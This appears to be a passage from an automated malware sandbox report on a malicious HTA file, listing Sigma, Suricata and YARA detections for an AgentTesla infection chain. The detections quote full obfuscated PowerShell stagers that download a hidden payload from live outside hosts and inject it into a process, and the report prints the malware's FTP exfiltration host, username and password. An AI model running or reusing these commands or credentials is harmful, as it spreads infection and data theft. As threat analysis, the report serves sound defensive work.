ZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdl

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline", ProcessId: 3496, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4176, TargetFilename: C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS" , ProcessId: 1136, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4176, TargetFilename: C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline", ProcessId: 3496, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T08:28:29.009764+0100	2020423	1	Exploit Kit Activity Detected	192.3.22.13	80	192.168.2.6	54436	TCP

ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T08:27:55.958509+0100	2057635	1	A Network Trojan was detected	192.3.22.13	80	192.168.2.6	54436	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T08:28:13.048884+0100	2049038	1	A Network Trojan was detected	142.215.209.78	443	192.168.2.6	49725	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T08:27:55.958509+0100	2858295	1	A Network Trojan was detected	192.3.22.13	80	192.168.2.6	54436	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T08:28:28.835822+0100	2858796	1	A Network Trojan was detected	192.168.2.6	54436	192.3.22.13	80	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T08:28:05.608028+0100	2858795	1	A Network Trojan was detected	192.168.2.6	49712	192.3.22.13	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF

Avira URL Cloud: Label: malware

Found malware configuration

Source: 12.2.AddInProcess32.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.elquijotebanquetes.com", "Username": "mybloddycockcpanel_owner@elquijotebanquetes.com", "Password": "4r@d15PS!-!h"}

Multi AV Scanner detection for submitted file

Source: seethebestthingswithgreatsituationshandletotheprogress.hta

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: seethebestthingswithgreatsituationshandletotheprogress.hta, type: SAMPLE

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.6:49725 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2155460515.0000000007B46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.2474342521.00000000074BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2472019316.0000000006FB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2160113996.0000000008AC8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Windows\system32\TenantRestrictionsPlugin.dlle2s1t.pdb source: powershell.exe, 00000001.00000002.2277730748.0000000007679000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.pdb source: powershell.exe, 00000001.00000002.2267939334.0000000005151000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.2474342521.00000000074BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2472019316.0000000006FB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbQ source: powershell.exe, 00000003.00000002.2160113996.0000000008AC8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.2474342521.00000000074BB000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49712 -> 192.3.22.13:80
Source: Network traffic	Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.6:54436 -> 192.3.22.13:80
Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 192.3.22.13:80 -> 192.168.2.6:54436
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.22.13:80 -> 192.168.2.6:54436
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.22.13:80 -> 192.168.2.6:54436
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.6:49725

Yara detected Generic Downloader

Source: Yara match	File source: 12.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
